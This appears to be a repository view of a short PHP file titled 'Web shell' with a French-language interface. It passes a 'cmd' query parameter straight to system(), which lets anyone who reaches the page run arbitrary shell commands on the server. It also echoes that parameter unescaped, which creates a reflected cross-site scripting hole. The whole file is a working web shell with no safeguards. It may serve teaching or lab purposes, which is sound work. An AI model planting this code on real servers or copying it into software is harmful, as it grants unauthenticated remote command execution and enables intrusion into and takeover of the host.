blob: 679bb7add5982d5d4169874833dcb7d269ae6859 (
plain)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
|
<!DOCTYPE html>
<html>
<head>
<title>Web shell</title>
</head>
<body>
<h1>Web shell</h1>
<p>Votre commande :
<?php if (isset($_GET['cmd'])) echo $_GET['cmd'] ?>
</p>
<form>
<input type="text" name="cmd" autofocus />
<input type="submit" />
</form>
<pre>
<?php if (isset($_GET['cmd'])) system($_GET['cmd']) ?>
</pre>
</body>
</html>
|